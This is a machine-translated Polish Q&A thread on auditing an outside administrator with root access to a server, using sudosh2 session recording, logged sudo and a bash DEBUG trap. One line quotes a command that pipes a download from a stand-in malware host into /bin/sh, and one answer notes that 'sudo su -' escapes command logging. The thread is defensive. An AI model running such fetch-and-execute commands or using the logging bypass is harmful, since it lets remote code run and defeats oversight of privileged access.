Chcę przyznać dostęp do mojego serwera root zewnętrznemu administratorowi systemu, ale chcę dokładnie sprawdzić, co robi z moim serwerem, np. Kopiować dane, których nie chcę, aby działały itd. Chciałbym również śledzić, do jakiego pliku można uzyskać dostęp, nawet w trybie tylko do odczytu i bez edycji.
Jak mogę to zrobić?
Odpowiedzi:
Ufaj ale sprawdzaj!
Sprawdź sudosh2 . sudosh2 jest dostarczany przez porty FreeBSD. Dostępne są pakiety dla RedHat i Ubuntu. Oto opis z ich strony internetowej:
Sudosh pozwoli ci odtworzyć sesję użytkownika, co pozwoli ci zobaczyć wszystkie dane wejściowe i wyjściowe tak, jak użytkownik to widział. Widzisz wszystko, naciśnięcia klawiszy, literówki, spacje, to, co edytowali
vi
, wyjściewget -O- http://zyxzyxzyxzyx.ru/haxor/malware | /bin/sh
itp.Możliwe jest wysyłanie dzienników sudosh do syslog, dzięki czemu można je przechowywać na centralnym serwerze syslog z dala od systemu.
Zauważ, że sudosh2 jest zamiennikiem sudosh, który został porzucony przez jego autora
Czy pracujesz w instytucji akademickiej, w której użytkownicy nalegają na uprawnienia administratora? A może pracujesz w korporacji i chcesz zezwolić użytkownikom na korzystanie z uprawnień administratora na ich własnych maszynach wirtualnych? To może być rozwiązanie dla Ciebie.
źródło
Nie udzielaj mu uprawnień roota. Zamiast tego daj mu nieuprzywilejowane konto użytkownika i poproś, aby wykonał całą swoją pracę
sudo
, co spowoduje zarejestrowanie wszystkich jego poleceń.Należy pamiętać, że jeśli ta osoba ma złych zamiarów i dać mu pełne przywileje sudo, że będzie znaleźć sposób przeprowadzenia tych złych zamiarów bez polecenia te są rejestrowane. W takim przypadku należy przyznać mu dostęp tylko do określonych poleceń, których potrzebuje do wykonania swojej pracy.
źródło
sudo su -
i mieć root root, który nie będzie zalogowany (poza tym, że go uruchomiłeś). To jest to, co zwykle piszę, gdy chcę wykonać więcej niż jedno polecenie jako root za jednym razem lub jeśli chcę uzupełnić tabulatory w katalogach, których normalni użytkownicy nie mogą odczytać.sudo su -
razie potrzeby możesz wyraźnie zabronić .Nie jestem zaznajomiony z sudosh2, ale umieszczam w moim
.bashrc
rejestrze następujące polecenia , które wpisujębash
w pliku~/.command_log
:Powyżej ustawia pułapkę
DEBUG
, która jest wykonywana tuż przed wykonaniem zwykłego polecenia.caller
Wbudowaną służy do badania, czy polecenie jest wpisane na interaktywnej powłoki lub prowadzonym przez coś podobnego.bashrc
. Wartość${BASH_COMMAND}
zawiera aktualnie wykonywane polecenie.źródło